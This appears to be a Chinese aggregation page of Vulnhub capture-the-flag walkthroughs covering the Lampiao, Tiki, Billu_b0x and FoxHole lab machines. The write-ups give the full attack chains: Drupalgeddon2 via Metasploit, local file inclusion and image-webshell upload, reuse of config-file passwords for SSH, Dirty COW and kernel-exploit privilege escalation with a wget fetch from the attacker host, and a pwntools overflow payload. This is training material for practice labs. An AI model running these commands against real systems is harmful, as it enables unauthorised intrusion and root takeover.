精华内容
下载资源
问答
  • Vulnhub靶场题解

    2018-08-24 17:17:10
    介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
  • VulnHub靶场之Lampiao

    2019-10-13 19:22:57
    VulnHub靶场之Lampiao 最近事情有点多,但是还是要抽出点时间来学习的!!! 老样子,Lampiao虚拟机先启动,然后再启动kali!! Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!..

    VulnHub靶场之Lampiao

    最近事情有点多,但是还是要抽出点时间来学习的!!!
    老样子,Lampiao虚拟机先启动,然后再启动kali!!
    Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!
    在这里插入图片描述
    打开kali,使用命令查看kali的ip:
    在这里插入图片描述
    使用nmap进行主机扫描:nmap -sP 192.168.80.1/24
    在这里插入图片描述
    继续使用nmap扫描端口:nmap -p 1-65535 -sV 192.168.80.129
    在这里插入图片描述
    开放了,22端口和80端口,1898端口
    22端口,尝试ssh弱口令爆破,没有结果,,,
    这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf
    80端口也没有是没有用的信息
    访问一下http://192.168.80.129:1898/,这个页面我也没发现什么东西,,,,
    在这里插入图片描述
    ok,对该网站进行信息收集
    先手动进行信息收集,发现存在robots.txt:
    在这里插入图片描述
    查看一下CHANGELOG.txt文件,发现网站的版本信息:
    在这里插入图片描述
    OK,再进行下一步,直接跑一下目录!!!
    在这里插入图片描述
    emmm,目录贼多,,,,再include里面看见有什么数据库的配置文件之类的
    好像没什么卵用,毕竟PHP文件是看不见内容的
    在这里插入图片描述
    到此不知该如何,,,,
    仔细想想还是有条路的,既然我们知道网站的搭建框架Drupal 7
    那么我们可以直接使用百度搜索一下该搭建框架的漏洞:
    在这里插入图片描述
    找到一个CVE漏洞,,,,
    既然有CVE漏洞编号,那就好办了,直接去kali上的msf进行search:
    在这里插入图片描述
    找到了,直接利用该漏洞:use exploit/unix/webapp/drupal_drupalgeddon2
    然后show一下需要设置的参数
    在这里插入图片描述
    ok,需要我们设置端口和ip,直接设置:

    msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.80.129
    RHOST => 192.168.80.129
    msf exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
    RPORT => 1898
    msf exploit(unix/webapp/drupal_drupalgeddon2) > run
    

    成功拿到shell:
    在这里插入图片描述
    emmm,以写入文件的方式获取标准shell失败:
    在这里插入图片描述
    换一种方法:python -c 'import pty; pty.spawn("/bin/bash")',成功:
    在这里插入图片描述
    发现是www-data用户,这说明需要我们进行提权!!
    同时,也发现了许多没有扫描出来的文件
    在这里插入图片描述
    打开qrc.png发现是 一个二维码,扫出来的结果是 Try harger! muahuahuahua:
    在这里插入图片描述
    打开audio.m4a,无语什么都没有:
    在这里插入图片描述
    打开LuizGonzaga-LampiaoFalou.mp3,一段2分多钟的mp3,感觉没有什么东西
    打开lampiao.jpg,是一张图片,好像也什么都没有
    emmm,没啥提示啊,查找用户名:cd /home | ls -l
    在这里插入图片描述
    找到了用户名,但是我们不知道密码怎么办,,,不慌,一般网站有数据库的配置文件
    继续翻找配置信息,,,,在/var/www/html/sites/default/settings.php中找到了配置信息!!
    在这里插入图片描述

    'username' => 'drupaluser'
    'password' => 'Virgulino'
    

    登录数据库看看:
    在这里插入图片描述
    在drupal数据库中有user表,第一个用户就是tiago,密码貌似也不是md5加密,不知道了,,,
    在这里插入图片描述
    后面不知道怎么办,查看大佬博客才知道,可以直接使用数据库的密码进行ssh登录,,,,
    输入命令:ssh tiago@192.168.80.129,密码就是:Virgulino,成功登入:
    在这里插入图片描述
    那么接下来应该就是提权了,,,,
    用uname -a 查看一下内核版本,16年的:
    在这里插入图片描述
    搜索一下漏洞,找到脏牛提权(CVE-2016-5195)
    在这里插入图片描述
    使用命令:cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~,copy到当前目录:
    在这里插入图片描述
    然后在靶机上创建目录文件,写入到文件中:
    在这里插入图片描述
    (emmm,1.cpp编译时出错,直接在重新创建一个文件40847.cpp)
    然后编译运行:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
    参数解释:

    1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
    2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
    3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
    4. -std=c++11就是用按C++2011标准来编译的
    5. -pthread 在Linux中要用到多线程时,需要链接pthread库
    6. -o dcow gcc生成的目标文件,名字为dcow
    

    执行文件,输入命令:./40847,得到root密码!!!
    在这里插入图片描述
    使用ssh连接:ssh root@192.168.80.129 输入密码:dirtyCowFun,成功提权!!:
    在这里插入图片描述
    成功get到flag:
    在这里插入图片描述

    总结:

    这个靶场还是学到了很多的东西,比如说如何一步一步进行渗透,
    虽说与真实的环境相差甚远,但是最主要了还是用来锻炼自己的能力,
    在本篇的实验中还是存在很多的不足的!还是要靠百度来进行一步一步的探索
    主要还是自己的知识面太窄了,比如说这个脏牛提权,我就不知道
    看来以后还是要多扩大自己的知识面,前面的都还行,遇上一个实验差不多,
    到了提权这一步就开始花里胡哨,自己就很懵比,就很难受!!!!
    还是要多学习啊~~

    展开全文
  • VulnHub靶场-Tiki

    2021-08-08 17:14:59
    靶场下载地址:tiki. 下载之后导入virtualbox启动 不能直接看到IP地址 先看一下kali的ip: Nmap扫一下192.168.1.0/24网段的主机,找到了靶机的IP地址 再扫一下靶机开放的端口: 开放了22 80 139 445 这四个端口 ...

    靶场下载地址:tiki.

    下载之后导入virtualbox启动
    在这里插入图片描述
    不能直接看到IP地址

    先看一下kali的ip:
    在这里插入图片描述
    Nmap扫一下192.168.1.0/24网段的主机,找到了靶机的IP地址
    在这里插入图片描述
    再扫一下靶机开放的端口:
    在这里插入图片描述
    开放了22 80 139 445 这四个端口

    浏览器访问80端口没有发现什么有用的东西
    在这里插入图片描述
    Dirbuster扫一下目录
    在这里插入图片描述在这里插入图片描述
    浏览器访问一下扫到的robots.txt
    在这里插入图片描述
    发现robots.txt文件里也有扫到的tiki目录,访问一下

    发现提示是tikiwikicms
    在这里插入图片描述
    再加上下载靶场时有提示是cve漏洞
    在这里插入图片描述
    百度搜索一下tikiwikicms的cve漏洞,找到一个认证绕过漏洞

    在这里插入图片描述
    Kali的漏洞库里搜一下脚本
    在这里插入图片描述
    使用脚本爆破
    在这里插入图片描述
    bp抓包修改pass字段为空
    在这里插入图片描述
    成功登录
    在这里插入图片描述
    登录之后找到了一个疑似账号密码的信息
    在这里插入图片描述在这里插入图片描述
    猜测可能是ssh登录的账号密码,尝试一下
    在这里插入图片描述
    发现没猜错,成功登录上了ssh,尝试提权

    查看一下权限,发现可以直接sudo登录
    在这里插入图片描述
    成功拿到root权限
    在这里插入图片描述

    展开全文
  • VulnHub靶场之Billu_b0x

    千次阅读 2019-12-18 21:40:27
    VulnHub靶场之Billu_b0x emmm,好久没玩靶机实验了,今天玩一下!! 用vm打开靶机,把网络适配改为NAT,然后运行kali和靶机

    VulnHub靶场之Billu_b0x

    emmm,好久没玩靶机实验了,今天玩一下!!
    用vm打开靶机,把网络适配改为NAT,然后运行kali和靶机
    首先肯定查看kali的ip地址,然后使用nmap命令:nmap -sP 192.168.80.0/24扫描主机
    在这里插入图片描述
    找到了靶机的IP地址,接下来进行端口扫描
    nmap命令:nmap -p 1-65535 -sV 192.168.80.129
    在这里插入图片描述
    开放了两个端口!!先不用管22端口,直接访问一下80端口:
    在这里插入图片描述
    进入到主页面得到一句提示sql注入???使用万能密码尝试登录结果失败,,,
    只能先放弃,看后续是否没有思路再来继续刚,先信息收集!!
    使用dirbuster和dirb两个一起爆破一下目录
    dirbuster扫描结果:

    Dir found: /cgi-bin/ - 403
    File found: /index.php - 200
    Dir found: /icons/ - 403
    File found: /c.php - 200
    File found: /in.php - 200
    File found: /show.php - 200
    Dir found: /doc/ - 403
    File found: /add.php - 200
    File found: /test.php - 200
    Dir found: /icons/small/ - 403
    File found: /head.php - 200
    Dir found: /uploaded_images/ - 200
    File found: /uploaded_images/c.JPG - 200
    File found: /uploaded_images/CaptBarbossa.JPG - 200
    File found: /panel.php - 302
    File found: /head2.php - 200
    Dir found: /server-status/ - 403
    

    dirb扫描结果:

    ---- Scanning URL: http://192.168.80.129/ ----
    + http://192.168.80.129/add (CODE:200|SIZE:307)                                
    + http://192.168.80.129/c (CODE:200|SIZE:1)                                    
    + http://192.168.80.129/cgi-bin/ (CODE:403|SIZE:290)                           
    + http://192.168.80.129/head (CODE:200|SIZE:2793)                              
    ==> DIRECTORY: http://192.168.80.129/images/                                   
    + http://192.168.80.129/in (CODE:200|SIZE:47554)                               
    + http://192.168.80.129/index (CODE:200|SIZE:3267)                             
    + http://192.168.80.129/panel (CODE:302|SIZE:2469)                             
    ==> DIRECTORY: http://192.168.80.129/phpmy/                                    
    + http://192.168.80.129/server-status (CODE:403|SIZE:295)                      
    + http://192.168.80.129/show (CODE:200|SIZE:1)                                 
    + http://192.168.80.129/test (CODE:200|SIZE:72)                                
    ==> DIRECTORY: http://192.168.80.129/uploaded_images/   
    + http://192.168.80.129/phpmy/ChangeLog (CODE:200|SIZE:28878)                  
    + http://192.168.80.129/phpmy/LICENSE (CODE:200|SIZE:18011)                    
    + http://192.168.80.129/phpmy/README (CODE:200|SIZE:2164)                      
    + http://192.168.80.129/phpmy/TODO (CODE:200|SIZE:190)                         
    + http://192.168.80.129/phpmy/changelog (CODE:200|SIZE:8367)                   
    ==> DIRECTORY: http://192.168.80.129/phpmy/contrib/                            
    + http://192.168.80.129/phpmy/docs (CODE:200|SIZE:2781)                        
    + http://192.168.80.129/phpmy/export (CODE:200|SIZE:8367)                      
    + http://192.168.80.129/phpmy/favicon (CODE:200|SIZE:18902)                    
    + http://192.168.80.129/phpmy/favicon.ico (CODE:200|SIZE:18902)                
    + http://192.168.80.129/phpmy/import (CODE:200|SIZE:8367)                      
    + http://192.168.80.129/phpmy/index (CODE:200|SIZE:8367)                       
    ==> DIRECTORY: http://192.168.80.129/phpmy/js/                                 
    ==> DIRECTORY: http://192.168.80.129/phpmy/libraries/                          
    + http://192.168.80.129/phpmy/license (CODE:200|SIZE:8367)                     
    ==> DIRECTORY: http://192.168.80.129/phpmy/locale/                             
    + http://192.168.80.129/phpmy/main (CODE:200|SIZE:8367)                        
    + http://192.168.80.129/phpmy/navigation (CODE:200|SIZE:8367)                  
    + http://192.168.80.129/phpmy/phpinfo (CODE:200|SIZE:8367)                     
    + http://192.168.80.129/phpmy/phpmyadmin (CODE:200|SIZE:42380)                 
    ==> DIRECTORY: http://192.168.80.129/phpmy/pmd/                                
    + http://192.168.80.129/phpmy/print (CODE:200|SIZE:1064)                       
    + http://192.168.80.129/phpmy/robots (CODE:200|SIZE:26)                        
    + http://192.168.80.129/phpmy/robots.txt (CODE:200|SIZE:26)                    
    ==> DIRECTORY: http://192.168.80.129/phpmy/scripts/                            
    ==> DIRECTORY: http://192.168.80.129/phpmy/setup/                              
    + http://192.168.80.129/phpmy/sql (CODE:200|SIZE:8367)                         
    ==> DIRECTORY: http://192.168.80.129/phpmy/themes/                             
    + http://192.168.80.129/phpmy/url (CODE:200|SIZE:8367)                         
    + http://192.168.80.129/phpmy/webapp (CODE:200|SIZE:6917)        
    + http://192.168.80.129/phpmy/setup/config (CODE:303|SIZE:0)                   
    ==> DIRECTORY: http://192.168.80.129/phpmy/setup/frames/                       
    + http://192.168.80.129/phpmy/setup/index (CODE:200|SIZE:12970)                
    ==> DIRECTORY: http://192.168.80.129/phpmy/setup/lib/                          
    + http://192.168.80.129/phpmy/setup/scripts (CODE:200|SIZE:5169)               
    + http://192.168.80.129/phpmy/setup/styles (CODE:200|SIZE:6941)                
    + http://192.168.80.129/phpmy/setup/validate (CODE:200|SIZE:10)                   
    -----------------
    END_TIME: Mon Nov 11 04:50:43 2019
    

    发现存在很多可疑的目录!
    先访问一下phpmy目录,看是不是phpmyadmin页面:
    在这里插入图片描述
    果然是,先放一边,再逐一进行访问页面,先访问c.php,空白页面
    访问in.php,发现是phpinfo,而且好像还有文件包含漏洞:
    在这里插入图片描述
    show.php什么都没有,空白页面,add.php好像是一个文件上传的页面:
    在这里插入图片描述
    访问一下test.php得到了一个提示!!!
    在这里插入图片描述
    file参数???这不是刚好和刚才那文件包含漏洞相吻合??传递get参数,不行,,猜测是post,成功:
    在这里插入图片描述
    好的,那么就可以利用一下这个文件包含漏洞来查看其他文件的内容了
    c.php、show.php、in.php、index.php、add.php、head.php、panel.php
    想到还有个phpmyadmin页面,首先先读取一下phpmyadmin的配置文件,看看能否找到登陆的账号和密码:
    在这里插入图片描述
    类似账号密码,还是root的?尝试登录phpmyadmin,失败,试试ssh连接一下,毕竟是root
    没想到直接登陆成功,,,,:
    在这里插入图片描述
    实验完成????还是继续玩下走吧,,,phpmyadmin还没登陆成功呢
    查看show.php的时候发现,好像是数据库查询??:
    在这里插入图片描述
    查看一下c.php,发现一个用户名密码,先记下来billu\b0x_billu
    等查看完页面再去尝试一下是否为phpmyadmin的账号密码,免得麻烦:
    在这里插入图片描述
    add.php就是一个静态的页面,根本没有上传的功能,,,,
    在这里插入图片描述
    panel.php好像就是首页登陆成功之后进入的页面,先放一边:
    在这里插入图片描述
    还有两个head页面都是显示图片,,看完之后了解到了不少的信息
    主要的还是关于c.php页面中的用户名和密码,尝试是否是phpmyadmin的登录密码
    直接去尝试一下,登陆成功:
    在这里插入图片描述
    经过简单收集,找到了一个用户名密码biLLu\hEx_it
    在这里插入图片描述
    回想到我们当初刚进入页面时是需要登录的,猜测这就是登录账号和密码,去尝试登录,成功:
    在这里插入图片描述
    发现在增加用户的页面有一个上传地方!!
    在这里插入图片描述
    先去看看源码的上传代码,发现存在漏洞:
    在这里插入图片描述
    看着源码我们就知道了,可以上传一个图片马,然后利用文件包含!!
    文件头绕过,在后面加上一句话木马:
    在这里插入图片描述
    成功执行:
    在这里插入图片描述
    这就好办了,能执行php代码的图片,不就和上一个靶场差不多吗??
    直接phpshell脚本一波!
    在这里插入图片描述
    得到shell:
    在这里插入图片描述
    使用python获取标准shell:python -c 'import pty; pty.spawn("/bin/bash")'
    在这里插入图片描述
    查看一下内核:
    在这里插入图片描述
    emmmm,又是ubuntu还是14年的,,继续脏牛提权??
    结果发现脏牛不行,,,,虚拟机直接崩溃??还是我等的时间不够长??算了换一种吧
    使用cat /etc/issue查看版本号:
    在这里插入图片描述
    直接查找exp:
    在这里插入图片描述
    该目录下不能创建文件,切换到/tmp下,kali开启服务,并移动文件到网站根目录下:

    vim /etc/apache2/ports.conf
    /etc/init.d/apache2 start
    cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html
    

    下载文件:wget 192.168.80.128:8888/37292.c
    在这里插入图片描述
    编译执行文件:

    gcc -pthread 37292.c -o 37292 -lcrypt
    ./37292
    

    成功拿到root权限,实验完成!!与我们之前ssh连接的一模一样,,,,
    在这里插入图片描述
    貌似没有flag,再见~~

    总结

    这个实验总的来说与上一个实验差不多,文件包含,然后反弹shell
    最重要的是知道了提权要换方法,不能一条路走到死,提权的时候脏牛不行
    就应该想到其他方法,比如说直接找Ubuntu的漏洞利用!!
    恩恩,这个实验也收获颇多~~望以后继续努力!!!!加油!

    展开全文
  • VulnHub靶场之FoxHole: 1.0.1 扫描IP以及端口: 访问web页面,扫描一下目录: 有个phpmyadmin,去看看,只是一张图片,,我透: 继续看看robots.txt,得到一个secret.html,访问,看不懂: 发现还有个admin.html...

    VulnHub靶场之FoxHole: 1.0.1

    扫描IP以及端口:
    在这里插入图片描述
    访问web页面,扫描一下目录:
    在这里插入图片描述
    有个phpmyadmin,去看看,只是一张图片,,我透:
    在这里插入图片描述
    继续看看robots.txt,得到一个secret.html,访问,看不懂:
    在这里插入图片描述
    发现还有个admin.html,查看一下,得到提示:

    Maybe take a nice *deep* look at that one purple fox picture? I dunno. 
    

    查看一下images,一堆图片,,,发现有三张紫狐的图片:
    在这里插入图片描述
    在这里插入图片描述
    图片隐写么,,与渗透有什么关系,,,下载下来:
    在这里插入图片描述
    binwalk一下,好像没发现什么东西:
    在这里插入图片描述
    利用工具steghide查看一下,密码为空,得到一条信息:
    在这里插入图片描述
    cat一下:
    在这里插入图片描述
    得到一个用户名密码:

    root@kali:/home/kali/Downloads# cat msg.txt 
    WTB1M3NjYXAzZFRoM0YweEgwbGUhClVzZXJuYW1lIGlzIGZveCA7Mw==
    root@kali:/home/kali/Downloads# base64 -d msg.txt 
    Y0u3scap3dTh3F0xH0le!
    Username is fox ;3
    root@kali:/home/kali/Downloads# 
    

    怀疑是ssh的,尝试登陆,登陆成功:
    在这里插入图片描述
    奇奇怪怪的,为什么id会出现这么多的东西,,,,
    不管了,先试试sudo -l,提示要输入密码,尝试fox的密码,不行,,,:
    在这里插入图片描述
    奇怪的文件,执行一下:
    在这里插入图片描述
    说啥各一个很长的理由才会给密码,,,这怎么搞???
    在这里插入图片描述
    看这样子很像溢出啥的啊,完了,,,
    先留着吧,,,,,
    问题解决了,一个简单的栈溢出,,,本地py脚本:

    from pwn import *
    sh = process('./GiveMeRootPlz')
    payload = 'a' * 516 + "\xad\x62\x55\x56"
    print(payload)
    sh.sendline(payload)
    sh.interactive()
    

    本地可以得到root权限:
    在这里插入图片描述
    msf生成600位随机字符

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
    

    将生成的随机字符输入到程序:
    在这里插入图片描述
    计算偏移:

    /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q Ar2A
    

    得到516,偏移到secret函数去,执行/bin/bash
    ssh到靶机获取权限(516不行,,,也不知道为啥,换成515即可):
    在这里插入图片描述

    得到flag:
    在这里插入图片描述

    展开全文
  • vulnhub靶场渗透学习-JIS-CTF

    千次阅读 2018-04-17 14:11:23
    剩下的就是使用ssh链接,然后打开之前的flag.txt 文件,得到第5个flag,至此该靶场我们已经渗透完成。 参考文章 http://blog.51cto.com/executer/2091159 经验总结 涉及到的工具...
  • vulnhub靶场,DC-3

    2021-07-11 15:32:42
    vulnhub靶场,DC-3 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 攻击机:kali(192.168.58.130) 靶机:DC-3(192.168.58.146) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境...
  • VulnHub靶场-Momentum: 2

    2021-08-09 23:59:14
    靶场下载地址:Momentum: 2 下好之后导入virtualbox启动 照例先扫一下主机 扫到靶机的ip地址为192.168.1.15 扫一下端口,开放了22和80端口 浏览器访问一下80端口 发现没有什么有用的信息,源码也看了一下,也没...
  • VulnHub靶场系列-Tr0ll2

    2020-05-28 10:59:28
    主机:192.168.136.133 靶机:192.168.136.158 先用nmap扫描网段发现目标主机以及其开放的端口和服务 ... 按照惯例查看一下源代码 发现一个有用的信息Author:Tr0ll,试一下利用这个能不能登上ftp ...
  • Vulnhub靶场题解.html

    2021-08-12 18:16:52
    Vulnhub靶场题解.,适合渗透测试人员学习交流
  • Vulnhub靶场篇:Vulnix

    千次阅读 2020-05-14 23:47:12
    VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 靶机IP:192.168.223.133 首先进行信息收集: nmap -sS -sV -T4 -A -p- 192.168.223.133 ...另外在端口25SMTP栏下我们看到VRFY(用于验证指定的用户/邮箱...
  • Vulnhub靶场实战指南.pdf
  • vulnhub靶场,Os-hackNos-1

    2021-07-18 17:18:11
    vulnhub靶场,Os-hackNos-1 环境准备 攻击机:kali(192.168.58.130) 靶机:Os-hackNos-1(192.168.58.156) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息...
  • Vulnhub靶场渗透测试系列DC-9 靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/
  • VulnHub靶场之Acid

    2019-09-29 20:06:38
    VulnHub靶场之Acid 本来这个实验昨天就应该完成了的,但是在自己电脑上弄得时候直接卡死,,,,
  • 1.Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的...2.通过Vulnhub靶场靶机实战讲解从信息收集到获得root权限拿到flag。 3.分享个人线下CTF解题和AWD混合对战经验和感受。
  • Vulnhub-DC-1 daoyuan ## 零、环境配置 ​ 1、虚拟机:vmware 15.5.6 ​ 2、攻击环境:kali linux 2020.3 192.168.143.128 ​ 3、靶机:DC-1 ​ 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 一...
  • Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在...
  • 初试Vulnhub靶场之Me and My Girlfriend(上) 今天刚刚了解到一个靶场vulnhub,然后看了很多大佬的wp就想着自己写一个,刚刚好手头上有一个新下的靶机Me and My Girlfriend,稍稍把玩了一下,拿到了第一个flag,...
  • 因为本透明水平看来还没达到手撕vulnhub的级别,所以这些靶场都是参考的前辈们的文章一步步来的,由于作者水平有限所以写的博客会“雷厉风行”走的是一步到位相对更简单的渗透路线,尽量少出现尝试并且失败渗透无果...
  • 靶机说明 目标读取 root下的 flag文件 靶机 ip(192.168.110.128) 攻击机 ip(192.168.110.127) 信息收集 nmap 扫端口,注意 22端口(ssh), 139端口(samba) 扫目录 发现文章用的 WordPress,用 wpscan扫一下有啥...
  • vulnhub靶场,-Acid

    2021-08-02 13:33:35
    vulnhub靶场,-Acid 环境准备 靶机下载地址:https://www.vulnhub.com/entry/acid-server,125/ 攻击机:kali(192.168.109.128) 靶机:-Acid(192.168.109.149) 下载好靶机之后直接使用VMware Workstation Pro...
  • Vulnhub靶场渗透-Lampiao

    2021-09-20 10:02:28
    shell,但没啥权限,就找到一个用户 在下面这个目录下找到数据库的设置文件,发现数据库的账号密码,数据库名 因为靶机开着 ssh服务,估计就是要连 ssh,现在就知道一个用户,和一个数据库账号密码 做了这么多靶场,...
  • vulnhub靶场,DC-2

    2021-07-10 22:41:49
    vulnhub靶场,DC-2 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 攻击机:kali(192.168.58.130) 靶机:DC-2(192.168.58.145) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境...
  • VulnHub靶场之CH4INRULZ_v1.0.1

    千次阅读 2019-10-16 15:23:40
    VulnHub靶场之CH4INRULZ_v1.0.1 继续靶机实验,老样子,先打开kali和靶机 查看kali的IP地址,然后进行主机查找 使用nmap命令:nmap -sP 192.168.80.1/24
  • vulnhub靶场,DC-7

    2021-07-15 20:12:18
    vulnhub靶场,DC-7 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-7(192.168.58.150) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan...
  • vulnhub靶场,Billu_b0x

    2021-07-20 16:55:17
    vulnhub靶场,Billu_b0x 环境准备 靶机下载地址:https://www.vulnhub.com/entry/billu-b0x,188/ 攻击机:kali(192.168.58.130) 靶机:Billu_b0x(192.168.58.159) 下载好靶机之后直接使用VMware Workstation Pro...
  • https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux,ubuntu 靶机:ip随配(192.168.119.137) 渗透开始 1.nmap发现主机,并扫描其ip...
  • vulnhub靶场,DC-1

    2021-07-10 00:16:21
    vulnhub靶场,DC-1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机:kali(192.168.58.130) 靶机:DC-1(192.168.58.144) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境...
  • VulnHub是一个有趣的靶场合集,里边有不同种类的漏洞模拟,初学者可以从中学到很多基础漏洞,是一个很不错的平台。 今天学习玩玩Gigachad 下载地址:http://www.vulnhub.com/entry/gigachad-1,657/ 推荐使用...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,476
精华内容 590
关键字:

vulnhub靶场